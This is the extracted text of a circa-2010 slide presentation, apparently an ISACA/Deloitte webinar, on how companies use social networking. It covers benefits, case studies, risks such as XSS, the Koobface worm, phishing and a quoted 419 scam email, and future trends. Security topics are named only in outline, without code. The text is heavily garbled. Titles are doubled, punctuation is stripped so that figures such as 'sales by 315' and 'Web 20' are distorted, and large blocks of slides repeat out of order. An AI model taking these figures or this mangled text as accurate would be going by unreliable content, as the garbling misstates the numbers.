Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg17
Social Networking CompaniesSocial Networking Companies
Social Media Popular Examples
Wikis Wikitravel Wikipedia wikiHow WikiBooks the TV IV
Blogs livejournal WordPress Blogger Technorati xanga
Social Networking myspacecom LinkedIn facebook friendster plaxo
RSS(Really Simple Syndication)
newsgator Bloglines iGoogle FeedBurner
Presence and Microblogging
twitter Pownce jaiku Hictu tumblr
Social Bookmarkingand Tagging
delicious digg reddit newsvine StumbleUpon
Online Photo andVideo Sharing
YouTube flickr shutterfly last-fm slideshare
wwwisacaorg18
Why and how companies are Why and how companies are using social networkingusing social networking
wwwisacaorg19
Statistics on companies using Social Statistics on companies using Social NetworkingNetworking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg20
Statistics on companies using Social Statistics on companies using Social Networking (cont)Networking (cont)
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg21
Companies typically adopt Social Media for Companies typically adopt Social Media for three major benefitsthree major benefits
Increase employee productivityand operational efficiencies
Foster creativity innovationand collaboration
Enhance customer andpartner relationships
1
2
3
wwwisacaorg22
Increase employee productivity and Increase employee productivity and operational efficienciesoperational efficiencies
bull Creates a lightweight institutional memory system for a companyrsquos intellectual assets to be easily captured stored and accessed
bull Reduce the net volume of e-mail and allow users to ldquopullrdquo information at their convenience as opposed to spending time reading through mass e-mail chain
bull Create better quality deliverables faster by drawing on the collective talents knowledge and experiences of other employees around the world
Operational efficienciesbull A leading energy company realized approximately $250K in annual cost savings by
conducting its employee conference virtually using Social Media
Improved reportingbull A global investment bank tightened reporting cycle times from several
weeks to ldquoabout 30 secondsrdquo per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg18
Why and how companies are Why and how companies are using social networkingusing social networking
wwwisacaorg19
Statistics on companies using Social Statistics on companies using Social NetworkingNetworking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg20
Statistics on companies using Social Statistics on companies using Social Networking (cont)Networking (cont)
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg21
Companies typically adopt Social Media for Companies typically adopt Social Media for three major benefitsthree major benefits
Increase employee productivityand operational efficiencies
Foster creativity innovationand collaboration
Enhance customer andpartner relationships
1
2
3
wwwisacaorg22
Increase employee productivity and Increase employee productivity and operational efficienciesoperational efficiencies
bull Creates a lightweight institutional memory system for a companyrsquos intellectual assets to be easily captured stored and accessed
bull Reduce the net volume of e-mail and allow users to ldquopullrdquo information at their convenience as opposed to spending time reading through mass e-mail chain
bull Create better quality deliverables faster by drawing on the collective talents knowledge and experiences of other employees around the world
Operational efficienciesbull A leading energy company realized approximately $250K in annual cost savings by
conducting its employee conference virtually using Social Media
Improved reportingbull A global investment bank tightened reporting cycle times from several
weeks to ldquoabout 30 secondsrdquo per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
